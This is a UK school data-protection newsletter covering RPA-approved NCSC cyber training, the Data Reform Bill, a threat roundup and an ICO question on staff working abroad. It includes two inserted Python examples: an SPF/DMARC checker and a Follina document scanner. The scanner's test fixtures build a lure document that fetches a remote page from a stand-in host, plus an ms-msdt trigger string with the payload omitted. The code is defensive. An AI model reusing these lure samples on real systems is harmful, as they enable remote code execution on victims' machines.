It has been a busy few months for us as we launched our brand new online Data Protection Portal. We hope you have had a chance to log in and use the new and improved tool, including its new data mapping and audit tools. This new portal has enabled us to make a step-change in the way that we support schools. If we haven’t visited you since we launched the portal, please get in touch and we will book in a date (either in-person or remote) to come and see you.
The main topic this month focuses on the free Cyber Security for School Staff training course (written by the NCSC) on our learning platform that has now been approved by the RPA as valid for RPA member schools in the event they need to make a cyber claim. There is also:
- our first thoughts on the consultation response for the new Data Reform Bill;
- guidance on handling subject access requests;
- our partner spotlight highlighting a company we work with and recommend;
- the latest information on recent and current cyber threats;
- a previously asked question about international transfers of data if working abroad; and
- the latest on the new & updated resources in Global Documents since the last newsletter.
You can still download our ‘All Staff’ update based on the content of this newsletter by clicking on the image to the side.
And, as always, if you have any further questions about the topics below, or if you would like to book your next visit from us, either online using video conferencing or onsite now that many schools are accepting visitors again, please get in touch via our new email address DPO@schoolpro.uk.
Don’t forget, if there is anything else that you need support with at this time, please ask and we will do whatever we can within our capacity to assist.
Stay safe and healthy!
DfE RPA Approval for Cyber Security Training
We have recently had confirmation from the RPA that our version of the NCSC “Cyber Security for School Staff” training course fulfils their requirements for schools / academies. They stated that they “can confirm that RPA member schools are able to use your learning platform to evidence completion of the NCSC training in the event of a cyber claim.”
If you are not already aware, we have taken the NCSC course and adapted it to our learning platform which means you can enrol staff and track their progress, and that staff will receive appropriately named/dated certificates at the end of the course. It is the same content as the NCSC course and is free on our platform.
Data Reform Bill
Last week saw the release of the Government’s response to their consultation on the proposed Data Reform Bill.
It is very much still early days for this proposed legislation, but below you can read our initial reaction to the response and how the proposals might change how we work with you in the future. There is a lot to go through in this response. It is unclear at this stage what the timeline is for the new legislation and exactly what it will look like. However, we have picked out a few points that we think could have an impact on schools:
Privacy Management Programs to be a compliance requirement
This is one that we have been expecting and built the online audit/accountability tool in the new portal with this possibility in mind. Essentially, the proposal is to reduce the accountability requirement down to 6 key areas (from the current 10). These are:
- leadership and oversight
- risk assessment
- policies and processes
- transparency
- training and awareness of staff
- monitoring, evaluation and improvement
This potentially simplifies the process. Our audit tool has been developed to be fully configurable so, if this change does go ahead as suggested, the existing tool can be adapted to the new Privacy Management Program and the relevant information, actions etc. already in the tool can be ported across as required. The Government have been keen to highlight that this is not intended to reduce the rigour of accountability or lower standards, but to create a more flexible tool that can scale depending on the risk level of the organisation. This may well ease some of the burden on smaller schools, for example.
Data Protection Officers to no longer be mandatory and to be replaced with a ‘senior responsible individual’
This proposal removes the need for an independent DPO with no conflicts of interest and allows the role to be taken on by a senior individual within the organisation. That person will still fulfil many of the existing roles of a DPO so it is likely that many organisations will simply continue with their existing arrangement. The ‘senior responsible individual’ will be responsible for:
- representing or delegating a representative to the ICO and data subjects
- ensuring appropriate oversight and support is in place for the programme and appointing appropriate personnel
- providing tailored training to ensure staff understand the organisation’s policies
- regularly auditing the efficacy of the programme.
At present, it isn’t fully clear whether this will apply to all organisations, or whether only small organisations and those that don’t process high levels of sensitive data will be able to drop the requirement for a “DPO”. We will obviously be keeping a keen eye on this one!
Removal of Data Protection Impact Assessments (DPIAs)
The thought here is to provide a more flexible and tailored approach to organisations. Again, the Government are keen to emphasise that this isn’t to reduce rigour and lower standards. And they state that organisations will still have to identify, assess and manage risk. This may allow for a more risk-based approach where lower risk processing has a simpler risk management approach and higher risk processing still follows a similar DPIA process to what is currently in place. However this is implemented, thankfully, this shouldn’t involve new risk management for legacy systems as the Government has stated that “existing DPIAs would remain valid as a way of achieving the new requirement.”
Removal of the Record of Processing Activities (RoPA) requirement
As with DPIAs, this is intended to provide a more flexible approach that can be tailored to different organisations depending on their size and the nature of their processing activities. This will link to the Privacy Management Programs and will require organisations to have “personal data inventories” which “describe what and where personal data is held, why it has been collected and how sensitive it is”. From what we’ve read so far, we believe our existing data mapping tool will still allow these inventories to be created, with very little adaptation from its current format.
Those are a few of the points we think will have an immediate impact on schools. There are more detailed analyses available online of all of the proposals, of course, such as this useful one from the IAPP – UK data protection reform: What is in the government’s proposals? (iapp.org)
It is also clear that not everyone is happy with the proposals. Reading through the response, the prevailing theme appears to be “we asked about this, most of you weren’t happy with the proposed changes… so we’re going to make some anyway”, which is an interesting approach to a consultation. In our SLT days, we often did student consultations and produced “you said, we did” responses to the students. This has been more of a “you said, we did something else”. And there are likely to be legal challenges as a result.
All we can say is, watch this space…
Subject Access Request Guidance
Recent and Current Cyber Threats
Increased Ransomware Threat
We are going to publish this again because we think it is important and we are still seeing a lot of phishing emails and similar threats circulating in schools.
UK, US, and Australian cyber experts are warning of a “growing wave of increasingly sophisticated ransomware attacks”. Lindy Cameron, the chief executive of the UK National Cyber Security Centre (NCSC), has warned that ransomware is “a rising global threat with potentially devastating consequences”. Organisations can get advice about how to prevent and protect against ransomware at the NCSC ransomware hub here:
Warnings have also gone out in the past fortnight regarding an increased cyber threat as a possible consequence of the ongoing situation in Ukraine. More information on what actions you can take can be found here:
New Email Security Tool
The NCSC has launched a new Email Security Check tool to help organisations check their email defences. You enter a domain name and the tool reads that domain’s public DNS records to report whether anti-spoofing controls (SPF and DMARC) and email privacy controls (TLS) are in place, which is a quick way to spot a domain that attackers could impersonate in phishing emails to your staff or parents. More information can be found here:
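The NCSC tool works by reading a domain’s public DNS records. As an added example (not the NCSC’s code, and not part of the original newsletter), here is an offline version of the anti-spoofing part of that check, run over constructed TXT records for three made-up domains (weak.example, good.example and nospf.example). It goes a little further than the page states: it grades the SPF “all” qualifier and the DMARC pct and reporting tags as well as the policy. A real check would replace lookup_txt with a DNS TXT query for the domain and for _dmarc.<domain>.

```python
import re

# Constructed TXT records for three hypothetical domains (not real lookups).
# Keys are DNS names, values are the TXT strings a resolver would return.
SAMPLE_TXT = {
    "weak.example":         ["v=spf1 include:_spf.mail.example +all"],
    "_dmarc.weak.example":  ["v=DMARC1; p=none; rua=mailto:reports@weak.example"],
    "good.example":         ["v=spf1 include:_spf.mail.example -all"],
    "_dmarc.good.example":  ["v=DMARC1; p=reject; pct=100; rua=mailto:dmarc@good.example"],
    "nospf.example":        ["some unrelated TXT record"],
}

def lookup_txt(name):
    """Stand-in for a DNS TXT query; returns the constructed records above."""
    return SAMPLE_TXT.get(name.lower(), [])

def spf_all_qualifier(records):
    """Return the qualifier on the SPF 'all' mechanism ('+', '-', '~', '?'),
    '?' if the record has no 'all' term (RFC 7208 defaults to neutral), or
    None if the domain publishes no SPF record at all."""
    for rec in records:
        if rec.lower().startswith("v=spf1"):
            m = re.search(r"(?:^|\s)([+\-~?]?)all(?:\s|$)", rec, re.IGNORECASE)
            if not m:
                return "?"
            return m.group(1) or "+"   # a bare 'all' means '+all'
    return None

def dmarc_tags(records):
    """Parse the first v=DMARC1 record into a tag dict, or None if absent."""
    for rec in records:
        if rec.strip().lower().startswith("v=dmarc1"):
            tags = {}
            for part in rec.split(";"):
                if "=" in part:
                    key, value = part.split("=", 1)
                    tags[key.strip().lower()] = value.strip()
            return tags
    return None

def assess_domain(domain, lookup=lookup_txt):
    """Return a list of finding codes for one sending domain (empty == OK)."""
    findings = []
    q = spf_all_qualifier(lookup(domain))
    if q is None:
        findings.append("SPF_MISSING")
    elif q in ("+", "?"):
        findings.append("SPF_PERMISSIVE")      # any sender passes SPF
    elif q == "~":
        findings.append("SPF_SOFTFAIL")        # many receivers treat as pass
    tags = dmarc_tags(lookup("_dmarc." + domain))
    if tags is None:
        findings.append("DMARC_MISSING")
    else:
        policy = tags.get("p", "").lower()
        if policy == "none":
            findings.append("DMARC_POLICY_NONE")   # monitoring only, nothing blocked
        elif policy == "quarantine":
            findings.append("DMARC_QUARANTINE")    # enforced, but weaker than reject
        elif policy != "reject":
            findings.append("DMARC_POLICY_INVALID")
        if tags.get("pct", "100") != "100":
            findings.append("DMARC_PARTIAL_PCT")   # policy applied to a sample only
        if "rua" not in tags:
            findings.append("DMARC_NO_REPORTING")  # no aggregate reports to learn from
    return findings

if __name__ == "__main__":
    for d in ("weak.example", "good.example", "nospf.example"):
        print(d, assess_domain(d) or ["OK"])
```

The finding codes map onto what you would expect a school to fix first: a missing or permissive SPF record and a DMARC policy of none leave the domain open to impersonation, whereas good.example comes back clean.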
NCSC Expands Services to Protect Against Online Scams
A record number of scams were removed online in 2021. This was due to the Active Cyber Defence programme and the National Cyber Security Centre has significantly expanded its services in order to protect the UK against this new level of threat. Read on for more:
Other Threats Identified…
- Snake Keylogger Malware Being Spread in PDF Files – Online security experts are warning people to take extra care when downloading PDF files after PDFs were recently used in campaigns to deliver Snake Keylogger malware. Snake Keylogger, which sits in eighth place in Check Point’s Global Threat Index, records a user’s keystrokes and transmits the collected data to cybercriminals. The advice is to use a robust email security solution that quarantines and inspects attachments. (Cheltenham IT Support | Reform IT)
- Microsoft Office Users Warned About Word Malware Scam – Cybersecurity expert Kevin Beaumont has warned Microsoft Office users about a flaw, dubbed “Follina”, that is exploited through Microsoft Word. A malicious Word document loads a remote file that invokes the Windows Microsoft Support Diagnostic Tool (msdt.exe) through its URL protocol handler, so simply opening the document can run attacker-supplied code without macros being enabled. The malware could allow attackers to run arbitrary code, install programs, change or delete data, or create new accounts. Microsoft has issued workaround guidance to disable the MSDT URL protocol. (Cheltenham IT Support | Reform IT)
- QuickBooks Customers Targeted by Phishing Attacks – Tax software vendor Intuit has warned that QuickBooks customers are being targeted with phishing attacks that are impersonating the company and are designed to lure targets with fake account suspension warnings. The phishing emails ask targets to click on a “Complete Verification” button which re-directs them to a phishing site designed to harvest personal information or infect their system with malware. The advice to QuickBooks customers is not to click any embedded links or open attachments, and to delete the messages from the inbox. (Cheltenham IT Support | Reform IT)
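To make the Word-document stage of the Follina item above concrete, here is an added example that is not from the original newsletter, Reform IT or Microsoft. A .docx is a zip of XML parts, and the external references Word will fetch when the document opens are listed in its .rels parts; the Follina lure is an oleObject relationship whose target is a remote web page, and that page in turn calls the ms-msdt: protocol handler. The scanner below flags any remote target on a relationship type Word fetches automatically, which is more general than Follina alone (it also covers remote-template injection), and a second function checks fetched content for the ms-msdt: trigger. The two sample packages, the lure URL and the stage-two HTML are all constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Relationship types Word resolves on its own when the document is opened.
# An External http(s)/mhtml target on one of these is the shape of the Follina
# lure (oleObject -> remote HTML that calls ms-msdt:) and of remote-template
# injection in general. Ordinary hyperlinks are also External but only load
# when a user clicks them, so they are deliberately not listed here.
AUTO_FETCHED_TYPES = {"oleObject", "attachedTemplate", "frame", "subDocument"}

def remote_auto_fetched_parts(docx_bytes):
    """Return (rels_part, relationship_type, target) for every relationship in
    the package that Word fetches on open and that points at a remote URL."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "Internal") == "External"
                remote = target.lower().startswith(("http:", "https:", "mhtml:"))
                if external and remote and rtype in AUTO_FETCHED_TYPES:
                    hits.append((name, rtype, target))
    return hits

MSDT_URI = re.compile(rb"ms-msdt:", re.IGNORECASE)

def contains_msdt_uri(second_stage):
    """True if fetched content (e.g. the remote HTML) invokes the MSDT protocol
    handler, the trigger that Microsoft's workaround disables."""
    return MSDT_URI.search(second_stage) is not None

def build_docx(rels_xml):
    """Build a minimal .docx-style package around a document.xml.rels part.
    Constructed test input; a real .docx has more parts but the same layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

RELS_HEAD = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
)

# Constructed lure: an OLE object relationship whose target is a remote page.
LURE_DOCX = build_docx(
    RELS_HEAD
    + '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
    + 'Target="http://lure.invalid/stage2.html!" TargetMode="External"/></Relationships>'
)

# Constructed benign document: its only external reference is a clickable hyperlink.
BENIGN_DOCX = build_docx(
    RELS_HEAD
    + '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
    + 'Target="https://www.ncsc.gov.uk/" TargetMode="External"/></Relationships>'
)

# Constructed second stage in the style of the published Follina HTML (payload omitted).
STAGE2_HTML = b'<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param (payload omitted)";</script>'

if __name__ == "__main__":
    for label, doc in (("lure", LURE_DOCX), ("benign", BENIGN_DOCX)):
        print(label, remote_auto_fetched_parts(doc) or "no remote auto-fetched parts")
    print("second stage calls msdt:", contains_msdt_uri(STAGE2_HTML))
```

Run over a quarantined attachment, the first function is cheap enough to put in a mail-gateway or SOC triage script: a document that references a remote OLE object or template before the user has done anything deserves a closer look regardless of what the second stage turns out to be.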
Previously Asked Question
Do staff working remotely abroad require international transfers of data and relevant safeguards being implemented?
In this case, the member of staff was having to stay overseas due to Covid restrictions and therefore work remotely until they could return to the UK. This could also apply if you had staff working remotely from countries outside the UK and that don’t have adequacy agreements in place. The ICO provided the following advice:
This wouldn’t class as an international transfer, because the receiver of the personal data wouldn’t be legally distinct from the sender, i.e. the person accessing the data is a member of staff rather than a separate entity. Accessing data in a third country would class as a transfer if the scenario did involve two separate legal persons. [However, in this instance,] you don’t need to consider it as an international transfer (implement an appropriate safeguard etc.) but you do need to apply appropriate security measures.
New & Updated Resources on the Portal
- Letter – Data Breach Notification Template.
- Flowchart for the Handling of FOI Requests.
- Template – Legitimate Interests Assessment.
- DPIA – Wonde – DfE Attendance Data Collection
- Minor updates based on information received from the DfE.
Data Protection in the News
SchoolPro TLC Ltd (2022)
SchoolPro TLC guidance does not constitute legal advice.
SchoolPro TLC is not responsible for the content of external websites.